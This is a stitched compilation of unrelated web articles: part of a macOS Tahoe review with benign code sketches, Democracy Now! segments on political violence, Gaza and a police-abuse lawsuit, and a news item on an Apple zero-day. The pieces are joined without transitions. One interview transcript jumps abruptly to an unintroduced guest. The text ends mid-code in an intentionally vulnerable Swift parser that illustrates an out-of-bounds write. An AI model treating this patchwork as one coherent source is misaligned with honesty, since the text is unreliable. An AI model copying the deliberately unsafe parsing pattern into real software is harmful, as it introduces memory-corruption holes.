Those backgrounds are set up through a redesigned Details panel, which slides over from the right when you click the name of your group chat or the contact you're texting with. It replaces the pop-up-style Details panel from older OS versions, and the fact that you can leave the window and return to it without closing the Details page makes it more pleasant to interact with.
An entirely separate Backgrounds tab gives you some preset color and image options, along with letting you generate a background in Image Playground (for Apple Intelligence-enabled devices) or pull from your Photos library. The pre-programmed backgrounds, for better or worse, are all subtly animated when the window is active, which can make some text on them harder to read.
The new Details pane slides over from the right, rather than popping up.
The backgrounds do go static when the Messages window is out of focus, but for a persistently static background, you'll want to use a photo from your library. I finally got Image Playground to cooperate when I asked for a "solid purple background with no other objects"; just asking for a solid color usually encouraged it to try to improvise.
When you've enabled a background, your own bubbles stay blue, but the gray bubbles from the other people you're talking to become translucent panes of Liquid Glass. The only things I really ever had trouble reading consistently were the timestamps, names, and other status messages that just show up as unadorned text without any kind of drop shadow or backing material.
Rather than one endlessly scrolling Details page, it's now broken up into other tabs for photos, links, and documents, to make it a little easier to dig through all the different kinds of things that you've exchanged with the person or people you're talking to. It's also possible to add and edit contact cards directly from the main Info tab.
Choosing from among built-in backgrounds and color options.
The Messages update in iOS 26 and macOS Tahoe adds spam protection and screening of messages from unknown senders, which has prompted concern and veiled legal threats from some political fundraisers (I do generally think it is a good sign when the people and organizations who abuse the status quo the most get upset about something Apple has added, as Meta did a few years ago when Apple cracked down on some kinds of app tracking). As much as we all love getting texts from candidates running for US House districts thousands of miles from where we live, from people claiming we have outstanding tolls due in states we've never been to, or from shady organizations spreading political misinformation, I think a lot of people are going to enjoy these features.
Other additions to the Messages app, at least for people safely ensconced in a group of blue-bubble friends, are live-updating polls and typing indicators that tell you which person in a group chat is typing.
Notes
The Notes app can import and export Markdown files now.
These days I tend to draft longer reviews and other feature work in Typora, a simple cross-platform Markdown text editor that supports exporting files to HTML that are easy to paste into our WordPress-based CMS. But I regularly jot down outlines, drafts of certain sections or paragraphs, and other bits and pieces in the Notes app, which is also my main repository for podcast research notes, to-do lists, and anything else I need to jot down quickly.
Apple has made my life somewhat easier this year by adding basic Markdown support to the Notes app—not the ability to write Notes in the Markdown language, but to import Markdown files into Notes and export Markdown files from Notes.
Markdown is a language with a lot of subvariants, and Apple notes that your Markdown files may look different in Notes than they do in the editor that made them. But for my Typora-made files that just use simple text formatting, ordered and unordered lists, and links, I had no problems getting files into and out of Notes with their formatting intact.
Terminal
The Terminal app gets new styles and sheds its actual 1970s terminal-based default size.
The Terminal gets a subtle visual makeover in Tahoe, mainly via new "Clear Light" and "Clear Dark" theming options that add a touch of Liquid Glass translucency to the window.
The default typeface has been changed, from size 11 SF Mono Regular to size 12 SF Mono Terminal Regular—there's no real difference that I can see for regular letters and numbers, but Apple says the new Terminal supports Powerline glyphs, and I'd assume that's the main change between the two typefaces. Default windows open at a size of 120 columns and 30 rows, up from the previous 80 columns and 24 rows (those numbers were derived from the display resolutions of 1970s-era computer terminals, so the change is quietly momentous).
I did notice that the new theming and window sizing were only used by default on fresh installs of Tahoe; an upgrade install from macOS Sequoia still used the old default theme and 80×24 window size.
Finally, beyond the new Clear themes and all of the old ones that are still included, Apple says the new Terminal app has 24-bit color support, allowing users to choose from among 16.7 million colors when customizing the window.
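If you want to see the 24-bit support for yourself, truecolor in a terminal is driven by standard ANSI escape sequences. This quick Node-flavored TypeScript sketch prints a gradient that renders as a smooth ramp in a truecolor terminal and as visible bands in a 256-color one:

```ts
// Print an 80-column background gradient using 24-bit ANSI color codes;
// ESC[48;2;R;G;Bm sets an RGB background, ESC[0m resets it.
for (let col = 0; col < 80; col++) {
  const red = Math.round((col / 79) * 255);
  process.stdout.write(`\x1b[48;2;${red};64;${255 - red}m \x1b[0m`);
}
process.stdout.write("\n");
```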
The Passwords app and passkeys
It's not a perfect comparison, but I think passkeys now are a bit like USB-C was in the mid-to-late 2010s: a well-intentioned idea with a lot of potential and wide industry buy-in, clearly better in important ways than the passwords they're meant to replace. But the early rollout has been piecemeal and protracted and a bit messy, and it may still be a few years before passkeys really come into their own.
This Apple developer video from this year's WWDC is a wide-ranging look at all the things Apple is doing to help streamline passkeys and their implementation in Apple's Passwords app this year, mainly focused on using passkeys instead of passwords for new accounts, keeping passkeys up to date when they change, and seamlessly helping to migrate users to passkeys as apps and services add support for them.
Tahoe and Apple's other OS updates have added an account creation API that websites and apps can use to generate a passkey instead of a password when users sign up for a new account; this passkey can then be stored in Passwords, or any third-party app capable of storing passkeys, and synced between your devices to make sign-in easier everywhere.
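Apple's developer video covers the native side; on the web, account creation with a passkey builds on the standard WebAuthn call that credential managers like Passwords plug into. A hedged sketch (not Apple's new native API; the relying-party and user details are hypothetical, and the challenge would come from your server):

```ts
// Standard WebAuthn registration, not Apple's account-creation API.
// Requesting a discoverable ("resident") credential is what makes this
// a passkey that Passwords or a third-party manager can store and sync.
async function createPasskey(challenge: Uint8Array): Promise<Credential | null> {
  return navigator.credentials.create({
    publicKey: {
      challenge,                                  // server-provided nonce
      rp: { id: "example.com", name: "Example" }, // hypothetical relying party
      user: {
        id: new TextEncoder().encode("user-1234"),
        name: "user@example.com",
        displayName: "Example User",
      },
      pubKeyCredParams: [{ type: "public-key", alg: -7 }], // ES256
      authenticatorSelection: {
        residentKey: "required",       // discoverable credential = passkey
        userVerification: "preferred", // e.g., Touch ID on a Mac
      },
    },
  });
}
```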
Apps and websites are able to signal to Passwords and other password managers when a passkey needs to be updated, like when a user changes the email address on their account or some other information after they've already signed in. The same API is also able to revoke passkeys, preventing users from trying to sign in using a passkey that no longer functions.
And when using a password to sign in to an app or website that supports passkeys, those apps will automatically be able to generate a passkey for that account and add it to the user's password manager. This won't replace the user's password—they won't suddenly be locked out on other devices that don't support passkeys or aren't synced with Passwords or another credential manager—but it does build an off-ramp that people can use to throw out their passwords and switch to a passkey-only setup at some point later on.
The Passwords app is able to export and import passkeys and other information securely, in accordance with new FIDO Alliance standards.
Because all of the tech industry's major players are trying to drive adoption of passkeys, Apple has made sure that these features work not just in the built-in Passwords app, but in third-party password managers and credential-storage apps that use the APIs that Apple provides for saving and autofilling credentials.
To that end, Apple has also implemented new standards developed by the FIDO Alliance for importing and exporting passkeys between different apps that support them. Exporting data from a password manager generally means spitting out a large plaintext .csv file and then importing that file into the new app you plan to use; the new Credential Exchange Protocol (CXP) and Credential Exchange Format (CXF) facilitate direct, secure communication between two different credential managers and standardize the formats used to store and export passkeys, passwords, and other data.
As Apple's Passwords app becomes more useful and feature-rich, it will become more and more feasible for some users paying for a third-party password manager to switch to Apple's version instead. These new changes should help make that easier (and make the reverse easier, for people who decide to migrate from Apple's ecosystem to someplace else).
Metal 4
Tahoe, iOS, and iPadOS are all getting a new version of the Metal graphics and GPU compute API for the first time since 2022.
On the gaming side, Metal 4 improves MetalFX upscaling, improves shader compilation speed, and adds the ability to generate interpolated frames, which can boost frame rates without requiring hardware upgrades.
For readers not well-versed in PC gaming, frame generation features look at two frames that your GPU has rendered and then use machine-learning algorithms to generate a frame in between them. This is less computationally intensive than actually rendering all three of those frames, and it can be combined with MetalFX's existing temporal upscaling, boosting performance even further.
Apple says that frame generation in Metal 4 uses the same depth and motion vectors that the MetalFX upscaler does, so games that have already adopted MetalFX should be able to add frame-generation support relatively easily.
But frame generation on PCs has real downsides, and we'd assume that frame generation on the Mac will have the same weaknesses. The first is that it introduces some extra input latency, because it's intentionally introducing a small delay to grab two frames so that it can create the interpolated frames between them.
But the main problem—especially for Apple's platforms, where the vast majority of users will be using the lower-end GPUs in the basic M1, M2, M3, and M4 chips rather than the beefier GPUs in the Pro, Max, or Ultra versions—is that frame-generation features need a reasonably high base frame rate to generate decent-looking results.
Think about how jerky a game looks when it's running at 15 or 20 frames per second—the onscreen image can change a lot from one frame to the next. That dramatically increases the likelihood that the interpolated frame in between the two rendered frames will look weird in some way, because the algorithm is just having to guess too much about the motion happening in between those two frames. Frame interpolation is good for making a smooth-running game look smoother; it's not a good tool for making an unplayable frame rate into a playable one.
The new upscaling features should be more broadly useful, even for the lower-end GPUs in Apple's products. For one, MetalFX now allows developers to change the input resolution dynamically. Say you're usually converting natively rendered 1080p frames into 4K frames, but your game hits a particularly complicated scene that's harder to render. MetalFX can briefly change that 1080p input resolution to something lower, which would briefly reduce image quality (since the upscaler is now turning an even lower-resolution image into a 4K image) in the interest of maintaining smoothness. Think of it as switching between the upscaler's "Quality" and "Performance" modes automatically, based on the complexity of the scene being rendered.
Metal 4 adds denoised upscaling to MetalFX, which is particularly useful when trying to provide high-quality upscaling for the ray-traced lighting effects that M3 and M4-series GPUs can render.
Those gaming improvements are helped along by some of the improvements on the GPU-compute side. These improvements include the addition of tensors, which can help with image upscaling and interpolation as well as accelerate machine-learning and AI-related workloads.
We spoke with John Poole, founder of Primate Labs and developer of Geekbench, about what some of the Metal 4 additions mean for developers and users.
"Metal 4 tensors enable developers to combine machine learning and graphics operations within the same pipeline, improving performance and efficiency since the application no longer has to move data between separate machine learning and graphics pipelines," Poole wrote to Ars. "Applications that only run machine learning or GPU compute pipelines won't benefit much from this change, as there's no need to move data between separate pipelines. I took a look at Geekbench 6 GPU and Geekbench AI GPU benchmark scores for macOS 15.6 and macOS 26.0 and saw modest improvements at best in both."
"Developers may appreciate having tensors as a first-class storage type, though, as it will make writing machine learning GPU kernels easier," Poole continued. "I expect this change is primarily a runtime change (in that it doesn't require hardware support), which is why it's available on older Macs, iPhones, and iPads."
One throughline for most of the major additions to Metal 4: They're all attempts to keep Apple relevant in areas where its competitors, most notably Nvidia, currently have the upper hand.
Metal 4 does require a sufficiently modern Apple Silicon processor—either an Apple M1 or newer on the Mac side, or an Apple A14 Bionic or newer on iPhones and some iPads. Intel Macs and the very oldest supported iPhones and iPads with A12 and A13-series chips won't see any benefits.
Game Porting Toolkit 3.0
The other gaming improvement for Mac this year is version 3.0 of Apple's Game Porting Toolkit. The GPTK is formally a tool meant for developers who want to start exploring a Mac port by testing their existing Windows games through translation layers, converting DirectX API calls into Metal API calls that the Mac can work with (SteamOS and the Steam Deck run Windows games on Linux the same way, also thanks to many of the exact same open source projects).
But other companies and community members have used it to run unmodified Windows games on their Macs with no effort required on the part of the game developers. The most prominent paid solution is CrossOver; Whisky was a prominent community-developed alternative, but its developer stepped away from the project earlier this year. Projects like Sikarugir promise similar results, though they don't have the same reputation for user-friendliness.
This year's GPTK update uses Metal 4's upscaling and frame-generation improvements to translate Nvidia's DLSS upscaling and frame generation in games that support it. Enable DLSS in the Windows games you're trying to run, and the GPTK will attempt to translate it to MetalFX.
YouTuber Andrew Tsai tested a series of 10 Windows games using a beta version of GPTK 3.0 and CrossOver a couple of months ago. He generally came away impressed—version 3.0 of the GPTK adds enough features and fixes that some games that ran with glitches or visual artifacts now look just fine, and some games (including Starfield) that failed to run at all under older versions of the toolkit are now also working OK.
For all of Apple's gaming efforts, the company still tends to be announcing the same kinds of games: AAA titles from a couple of years ago that have already been available on the PC and consoles for quite a while. "Any AAA games at all" is an improvement over where the Mac was a few years ago, but we still haven't reached that tipping point where big games are being released simultaneously on both the PC and the Mac (give or take the odd indie megahit).
Grab Bag
Observing hallowed, time-honored tradition, let's take a minute to run down a list of changes that are worth documenting, but are either too small or too niche to need extended pontification. That's right, folks, it's the Grab Bag.
Lock screen typeface options
Tahoe's lock screen gets a customizable clock, though it still lags behind the iOS and iPadOS lock screens in customization options.
Credit: Andrew Cunningham
The lock screen on the Mac remains a desolate place, relative to the same area in both iOS and iPadOS—this is still a no-notifications, no-widgets zone that exists only to keep your Mac locked. But Apple will at least let you customize the look of the clock now, with a list of half a dozen typefaces that mirrors those available in iOS and iPadOS (but without the same color customization options, for some reason).
The setting to change the typeface is a bit buried and separate from all the other lock screen settings. You'll find it by opening Settings, clicking Wallpaper, and then clicking the Clock Appearance button. Select the typeface you want and the weight of the typeface (if applicable), and select whether to display it over the lock screen, over both the lock screen and your screen saver, or to turn it off entirely.
Live translation
We'll have more about Apple's live translation features in our upcoming iOS 26 review, since it's slightly more relevant on Apple's mobile handheld software platform than on the Mac. But Macs that support Apple Intelligence—every Apple Silicon model going back to the M1—can translate messages and voice calls and provide subtitles for FaceTime calls using on-device language models. I still find most of Apple's AI-related features to be either underwhelming or inessential, but this one does feel like it could be genuinely useful for travelers or anyone looking to circumvent a language barrier.
Live Activities from iOS
A Live Activity from an iPhone app, displayed in the macOS menu bar.
Credit: Andrew Cunningham
When you've got an iPhone paired with your Mac via iPhone Mirroring, you'll now automatically see pop-ups for Live Activities appear in your menu bar when they're active on the phone.
The small, black ovular widget appears on the left side of the right-hand menu bar area, with an icon and an estimated time when the activity is due to be completed. Tracking your takeout order? Trying to squeeze in five more minutes of something while you wait for your Lyft to show up? If it's on your phone, you can see it on the Mac.
New wallpaper screensavers
We've mentioned this elsewhere already, but Tahoe comes with a small collection of new moving wallpapers themed around the codename—these are the wallpapers that can start moving to act as a screensaver, and then slow down and come to a stop when it's time to be a desktop wallpaper again.
Nothing here has the retro-cool factor of last year's classic Macintosh-themed wallpaper, but there are still some pretty ones: light and dark versions of an abstract blue glassy swirl that kind of evokes flowing water, and a shot of the shores of Lake Tahoe during four different times of day.
Several new motion wallpapers are available in the Landscapes category, too: new locations include Goa, the Himalayas, the Ganges, and tea gardens in Kerala, India, along with a couple others. The Cityscape, Underwater, Earth, and other categories appear to have all the same wallpapers available as in Sequoia.
Two-factor autofill in any browser
When it's possible, you should move on from using SMS messages for two-factor authentication to codes generated by an app or to passkeys. But there are still plenty of times when you'll run into authentication code texts, either because you're trying to set up an account for the first time, or because the thing you're trying to log in to doesn't support anything else.
For those cases, Tahoe adds a handy feature: the ability to autofill these codes from the Messages and Mail apps into any browser, not just Safari. Just like when you use the equivalent feature in Safari or on iOS, macOS can delete these codes for you automatically after using them.
Game Overlay
The Game Overlay in macOS Tahoe.
Credit: Andrew Cunningham
Tahoe's new Game Overlay doesn't add features so much as it groups existing gaming-related features to make them more easily accessible.
The overlay makes itself available any time you start a game, either via a keyboard shortcut or by clicking the rocketship icon in the menu bar while a game is running. The default view includes brightness and volume settings, toggles for your Mac's energy mode (for turning on high-performance or low-power mode, when they're available), a toggle for Game Mode, and access to controller settings when you've got one connected.
The second tab in the overlay displays achievements, challenges, and leaderboards for the game you're playing—though only if they offer Apple's implementation of those features. Achievements for games installed from Steam, for example, aren't visible. And the last tab is for social features, like seeing your friends list or controlling chat settings (again, when you're using Apple's implementation).
More granular notification summaries
I didn't think the Apple Intelligence notification summaries were very useful when they launched in iOS 18 and macOS 15 Sequoia last year, and I don't think iOS 26 or Tahoe really changes the quality of those summaries in any immediately appreciable way. But following a controversy earlier this year where the summaries botched major facts in breaking news stories, Apple turned notification summaries for news apps off entirely while it worked on fixes.
Those fixes, as we've detailed elsewhere, are more about warning users of potential inaccuracies than about preventing those inaccuracies in the first place.
Apple now provides three broad categories of notification summaries: those for news and entertainment apps, those for communication and social apps, and those for all other kinds of apps. Summaries for each category can be turned on or off independently, and the news and entertainment category has a big red disclaimer warning users to "verify information" in the individual news stories before jumping to conclusions. Summaries are italicized and get both a special icon and a "summarized by Apple Intelligence" badge, just to make super-ultra-sure that people are aware they're not taking in raw data.
Personally, I think if Apple can't fix the root of the problem in a situation like this, then it's best to take the feature out of iOS and macOS entirely rather than risk giving even one person information that's worse or less accurate than the information they already get by being a person on the Internet in 2025.
As we wrote a few months ago, asking a relatively small on-device language model to accurately summarize any stack of notifications covering a wide range of topics across a wide range of contexts is setting it up to fail. It does work OK when summarizing one or two notifications, or when summarizing straightforward texts or emails from a single person. But for anything else, be prepared for hit-or-miss accuracy and usefulness.
Relocated volume and brightness indicators
The pop-ups you see when adjusting the system volume or screen brightness have been redesigned and moved. The indicators used to appear as large rounded squares, centered on the lower half of your primary display. The design changed over the years, but that's where they appeared throughout the 25-year existence of Mac OS X.
Now, both indicators appear in the upper-right corner of the screen, glassy rectangles that pop out from items on the menu bar. They'll usually appear next to the Control Center menu bar item, but the volume indicator will pop out of the Sound icon if it's visible.
New low battery alert
Tahoe picks up an iPhone-ish low-battery alert on laptops.
Credit: Andrew Cunningham
Tahoe tweaks the design of macOS's low battery alert notification. A little circle-shaped meter (in the same style as battery meters in Apple's Batteries widgets) shows you in bright red just how close your battery is to being drained.
This notification still shows up separately from others and can't be dismissed, though it doesn't need to be cleared and will go away on its own. It starts firing off when your laptop's battery hits 10 percent and continues to go off when you drop another percentage point from there (it also notified me without the percentage readout changing, seemingly at random, as if to annoy me badly enough to plug my computer in more quickly).
The notification frequency and thresholds can't be changed, whether you'd rather not be reminded at all or you'd like the reminders to start even earlier. But you could possibly use the battery level trigger in Shortcuts to customize your Mac's behavior a bit.
Recovery mode changes
A new automated recovery tool in macOS Tahoe's recovery volume.
Credit: Andrew Cunningham
Tahoe's version of the macOS Recovery mode gets a new look to match the rest of the OS, but there are a few other things going on, too.
If you've ever had a problem getting your Mac to boot, or if you've ever just wanted to do a totally fresh install of the operating system, you may have run into the Mac's built-in recovery environment before. On an Apple Silicon Mac, you can usually access it by pressing and holding the power button when you start up your Mac and clicking the Options button to start up using the hidden recovery volume rather than the main operating system volume.
Tahoe adds a new tool called the Device Recovery Assistant to the recovery environment, accessible from the Utilities menu. This automated tool "will look for any problems" with your system volume "and attempt to resolve them if found."
Maybe the Recovery Assistant will actually solve your boot problems, and maybe it won't—it doesn't tell you much about what it's doing, beyond needing to unlock FileVault on my system volume to check it out. But it's one more thing to try if you're having serious problems with your Mac and you're not ready to countenance a clean install yet.
The web browser in the recovery environment is still WebKit, but it's not Safari-branded anymore, and it sheds a lot of Safari features you wouldn't want or need in a temporary OS.
Credit: Andrew Cunningham
Apple has made a couple of other tweaks to the recovery environment, beyond adding a Liquid Glass aesthetic. The recovery environment's built-in web browser is simply called Web Browser, and while it's still based on the same WebKit engine as Safari, it doesn't have Safari's branding or its settings (or other features that are extraneous to a temporary recovery environment, like a bookmarks menu). The Terminal window picks up the new Clear theme, the new SF Mono Terminal typeface, and the new default 120-column-by-30-row size.
A new disk image format
Not all Mac users interact with disk images regularly, aside from opening them up periodically to install an app or restore an old backup. But among other things, disk images are used by Apple’s Virtualization framework, which makes it relatively simple to run macOS and Linux virtual machines on the platform for testing and other things. And the RAW disk image format used by older macOS versions can come with quite severe performance penalties, even with today’s powerful chips and fast PCI Express-connected SSDs.
Enter the Apple Sparse Image Format, or ASIF. Apple’s developer documentation says that because ASIF images’ “intrinsic structure doesn’t depend on the host file system’s capabilities,” they “transfer more efficiently between hosts or disks.” The upshot is that reading files from and writing files to these images should be a bit closer to your SSD's native performance (Howard Oakley at The Eclectic Light Company has some testing that suggests significant performance improvements in many cases, though it’s hard to make one-to-one comparisons because testing of the older image formats was done on older hardware).
The result is that disk images should be capable of better performance in Tahoe, which will especially benefit virtual machines that rely on them. This could help lightweight virtualization apps like VirtualBuddy and Viable that mostly exist to provide a front end for the Virtualization framework, as well as virtualization apps like Parallels that offer support for Windows.
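To see why the image format matters for VMs, consider how the Virtualization framework consumes disk images: the image file is wrapped in an attachment, and every block the guest OS reads or writes flows through it. A minimal sketch in Swift (the .asif path is hypothetical, and the image itself would be created beforehand, for example with Disk Utility):

```swift
import Foundation
import Virtualization

// Attach a disk image to a VM configuration. Under Tahoe that image can be
// an ASIF image; the attachment API is the same either way, which is why a
// faster image format speeds up guests without any code changes.
func makeStorageDevice(imagePath: String) throws -> VZVirtioBlockDeviceConfiguration {
    let url = URL(fileURLWithPath: imagePath)
    // All guest disk I/O flows through this attachment, so the image
    // format's performance characteristics land directly on the VM.
    let attachment = try VZDiskImageStorageDeviceAttachment(url: url, readOnly: false)
    return VZVirtioBlockDeviceConfiguration(attachment: attachment)
}

// Usage inside a larger VM configuration (other devices omitted):
// let config = VZVirtualMachineConfiguration()
// config.storageDevices = [try makeStorageDevice(imagePath: "/path/to/disk.asif")]
```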
Quantum-safe encryption support
You don’t have a quantum computer on your desk. No one does, outside of labs where this kind of technology is being tested. But when or if they become more widely used, they’ll render many industry-standard forms of encryption relatively easy to break.
Tahoe and Apple’s other OS updates this year add support for quantum-safe encryption algorithms like ML-KEM and ML-DSA to CryptoKit, the framework that allows third-party apps to leverage macOS’s built-in encryption technologies. This comes a year and a half or so after Apple began protecting iMessage conversations with post-quantum encryption algorithms.
Microsoft is also improving Windows 11’s support for quantum-safe encryption algorithms, as it announced earlier this year. We’re unlikely to need these improved encryption algorithms soon, but by adding support to their operating systems relatively early, companies like Microsoft and Apple make it more likely that the transition will be smoother and less visible for their end users.
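For developers, the shape of the new algorithms is familiar. ML-KEM is a key-encapsulation mechanism: one side derives a shared secret plus a small encapsulated value that only the other side's private key can unwrap. Here's a sketch of that flow using CryptoKit's existing X25519 key-agreement API as a stand-in, deliberately not guessing at the exact names of the new ML-KEM types, which slot into the same role:

```swift
import CryptoKit
import Foundation

// The KEM pattern, demonstrated with classical X25519: the ephemeral
// public key plays the part of ML-KEM's "encapsulation." A quantum-safe
// version swaps the key-agreement step for ML-KEM; the rest is unchanged.
func kemRoundTrip() throws {
    let recipient = Curve25519.KeyAgreement.PrivateKey()

    // Sender: derive a symmetric key; send ciphertext + ephemeral public key.
    let ephemeral = Curve25519.KeyAgreement.PrivateKey()
    let senderKey = try ephemeral
        .sharedSecretFromKeyAgreement(with: recipient.publicKey)
        .hkdfDerivedSymmetricKey(using: SHA256.self, salt: Data(),
                                 sharedInfo: Data(), outputByteCount: 32)
    let box = try AES.GCM.seal(Data("hello".utf8), using: senderKey)

    // Recipient: rebuild the same key from the "encapsulation" and decrypt.
    let recipientKey = try recipient
        .sharedSecretFromKeyAgreement(with: ephemeral.publicKey)
        .hkdfDerivedSymmetricKey(using: SHA256.self, salt: Data(),
                                 sharedInfo: Data(), outputByteCount: 32)
    _ = try AES.GCM.open(box, using: recipientKey)
}
```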
More post-processing options for video and images
Apple's VideoToolbox framework is what handles hardware-accelerated video encoding and decoding on Apple's platforms, and this year it's picking up a new VTFrameProcessor API that allows developers to use machine learning algorithms to enhance video playback and editing.
A frame rate conversion effect can adjust the frame rate of a video, something that can create a slow-mo effect in videos that weren't shot in slow-mo, and a motion blur effect can be added to videos, too. A Super Resolution scaler can intelligently upscale low-resolution videos. For video chats, a low-latency Super Resolution filter, temporal noise filtering, and frame interpolation can improve video quality and smooth out a low-frame-rate video chat.
Technically, the Mac saw the first versions of these improvements in the 15.4 update for Sequoia; the new VTFrameProcessor API is only new to iOS 26, iPadOS 26, and Catalyst apps that have been repackaged for the Mac. But additions like this can escape notice when these smaller updates come out, so it's worth calling attention to for Tahoe upgraders.
Tahoe clears the decks
The macOS Tahoe release will probably be remembered mostly for Liquid Glass. It’s a major change to the way things look, and for better or worse, those shifts tend to suck the oxygen out of the room.
I could take or leave Liquid Glass—I mostly don't mind it, but I’m not sure I'm convinced that it's an unambiguous improvement over what Apple was using before. The occasional instances of messy overlap or overzealous translucency aren't dealbreakers, but they are small regressions in usability and accessibility that Apple will need to keep massaging over time, just as it did after iOS 7 was released. And while I see the value in visual consistency, I do think forcing apps to use a rounded square icon no matter what gives them one less way to distinguish themselves from each other in the Dock, the Finder, or Spotlight.
But even Liquid Glass-skeptical power users should find enough things to like in Tahoe to justify the installation. Maybe you’re already using a clipboard manager or Spotlight replacement that does more than Apple’s new-and-improved version, but Quick Keys, automated Shortcuts, additional theming options, a more capable version of Metal, and the typical trail-mix-bag full of odds and ends all add up to a release that would feel pretty useful even if it looked the same as it did last year.
Getting this visual transition out of the way now also clears the decks for what could be a pretty busy macOS 27. Ending support for the last handful of Intel Macs gives Apple a cruft-clearing opportunity that it hasn’t had since 2009’s Snow Leopard release ended support for PowerPC Macs. And who knows what other features might be possible once the Mac shifts from Apple Silicon-first to Apple Silicon-only? We’ll find out in nine months or so.
Andrew is a Senior Technology Reporter at Ars Technica, with a focus on consumer tech including computer hardware and in-depth reviews of operating systems like Windows and macOS. Andrew lives in Philadelphia and co-hosts a weekly book podcast called Overdue.
Bishop William Barber Condemns Charlie Kirk Murder and the Right's Religious Nationalism
Democracy Now!
www.democracynow.org
2025-09-16 13:34:58
We speak to Bishop William J. Barber II about conservative Christian activist Charlie Kirk’s killing and the right-wing weaponization of his death. Barber says outrage over political violence should also extend beyond Kirk’s assassination, to what he refers to as the political violence ...
We speak to Bishop William J. Barber II about conservative Christian activist Charlie Kirk’s killing and the right-wing weaponization of his death. Barber says outrage over political violence should also extend beyond Kirk’s assassination, to what he refers to as the political violence of policy, including the hundreds around the world who die of poverty, war and disease every day. “You cannot claim that you believe in a god or Christ of love and justice and mercy and grace and truth, and then you push policies that prey on the very persons, in the very communities, that the Scriptures, that the example of Jesus and the prophet tells us we should not only pray for, but we should also be lifting up and helping up and protecting.”
Bishop Barber is president of Repairers of the Breach, national co-chair of the Poor People’s Campaign and founding director of the Center for Public Theology & Public Policy at Yale Divinity School.
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
Block the Bombs to Israel: Rep. Delia Ramirez Denounces Genocide in Gaza
Democracy Now!
www.democracynow.org
2025-09-16 13:28:54
Congressmember Delia Ramirez, one of the co-sponsors of the Block the Bombs Act, which would withhold offensive weapons deals from Israel that violate international law and humanitarian norms, responds to a U.N. commission’s recent conclusion that Israel is committing genocide in Gaza. She pro...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: I know you have to go, Congressmember Ramirez, but I wanted to ask you about this latest news. A United Nations inquiry has concluded Israel has committed genocide in Gaza. This is Navi Pillay, who headed the commission.
NAVI PILLAY: In our report, the commission found that the Israeli authorities and Israeli security forces committed and are continuing to commit the following underlying acts of genocide against the Palestinians in the Gaza Strip: one, killing members of the group; two, causing serious bodily or mental harm to members of the group; three, deliberately inflicting on the group conditions of life calculated to bring about its physical destruction in whole or in part; and, four, imposing measures intended to prevent births within the group.
AMY GOODMAN: Congressmember Delia Ramirez, you have called for — you just recently held a news conference with Mahmoud Khalil and others calling for an arms embargo against Israel. Explain.
REP. DELIA RAMIREZ: Yeah, well, first of all, Israel is committing a genocide, and I think it’s indefensible for anyone to, in this moment, try to make an excuse of what’s happening and allowing it to happen under our watch. I have a bill. It’s a specific, concrete bill that blocks bombs to Israel. It is one of the first bills in its nature, where now we have 47 members of Congress who have joined the bill. And it says we are going to withhold weapons. We’re not going to allow Donald Trump and Bibi Netanyahu to just easily make a transfer of these weapons, that we know have violated international law and killed babies. This afternoon, I will be having a deep discussion with a number of my colleagues, calling for them directly, in a meeting, urging them to join this bill immediately and bring it to a committee hearing in Armed Services, in the jurisdiction of the bill.
JUAN GONZÁLEZ: Yeah, I just wanted to ask Kevin Herrera: In the lawsuit that you, that your plaintiffs filed, they talked about, as well, the way that Venezuelans were singled out by these off-duty police, that they picked up the Venezuelans and beat them and had them arrested, but not other day laborers. Could you talk about that, as well?
KEVIN HERRERA: Yes, that’s correct. Based on the facts that we’ve heard from each of our plaintiffs, the off-duty police officers and Home Depot security, who dragged those individuals into the back of the Home Depot and abused them, also used nationalist epithets regarding their ethnicity, specifically accusing them of being Venezuelan, of being recent arrivals, of being someone that the government didn’t want there. One of our clients, who’s Colombian, told them that he was Colombian, and they said he was lying, and proceeded to hit him again.
So, with Willian, one of the saddest facts of his case is that he was profiled initially, during the first trauma that he experienced at the Home Depot, and now, over a year later, he’s been profiled again via the ways in which ICE is selecting people based on the color of their skin, based on their language and how they speak it, whether they speak with an accent, and here, apparently, based on their ability to speak out and call out injustice and racism in the United States. Willian was double-profiled, and now he’s suffering consequences within the ICE detention system, after he had already been through so much at the Home Depot.
AMY GOODMAN: Kevin Herrera, we want to thank you so much for being with us — of course, we’ll continue to follow this case — legal director of Raise the Floor Alliance. He’s an attorney for Willian Giménez González, speaking to us from Chicago. And thank you also to Congressmember Delia Ramirez of Chicago, the first Latina congressmember to represent Illinois.
And this sad news, just in: The acclaimed, Oscar-winning actor Robert Redford died early this morning at his home in Utah. He was 89 years old. He founded the Sundance Film Festival, which will be held in Utah for the last time this coming year before moving to Boulder. Again, the Oscar-winning director and actor Robert Redford has died at the age of 89. To see all of our interviews with Robert Redford at Democracy Now! as we attended the Sundance Film Festival over the years, go to democracynow.org.
Coming up, Reverend William Barber talking about the assassination of Charlie Kirk, Christian nationalism and more. Stay with us.
[break]
AMY GOODMAN: “Hog of the Forsaken” by the late folk legend Michael Hurley, performing in our Democracy Now! studio.
Apple backports zero-day patches to older iPhones and iPads
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 13:16:53
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks. [...]...
Apple has released security updates to backport patches released last month to older iPhones and iPads, addressing a zero-day bug that was exploited in "extremely sophisticated" attacks.
This security flaw is the same one Apple has patched for devices running iOS 18.6.2 and iPadOS 18.6.2, iPadOS 17.7.10, and macOS (Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8) on August 20.
Tracked as CVE-2025-43300, this vulnerability was discovered by Apple security researchers and is caused by an out-of-bounds write weakness in the Image I/O framework, which enables apps to read and write image file formats.
An out-of-bounds write occurs when attackers supply maliciously crafted input to a program that causes it to write data outside the allocated memory buffer, potentially triggering crashes, corrupting data, or even allowing remote code execution.
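To make the bug class concrete, here's a deliberately contrived sketch (in Swift, not Apple's actual Image I/O code) of the pattern behind most out-of-bounds writes: a parser trusting a size field taken from attacker-controlled input:

```swift
import Foundation

// A contrived parser that trusts a length field from a file header.
// If the header claims more pixel data than the buffer can hold, the
// copy writes past the end of the allocation: an out-of-bounds write.
func parsePixels(header claimedCount: Int, payload: [UInt8]) {
    precondition(!payload.isEmpty)
    let capacity = 16
    let buffer = UnsafeMutablePointer<UInt8>.allocate(capacity: capacity)
    defer { buffer.deallocate() }

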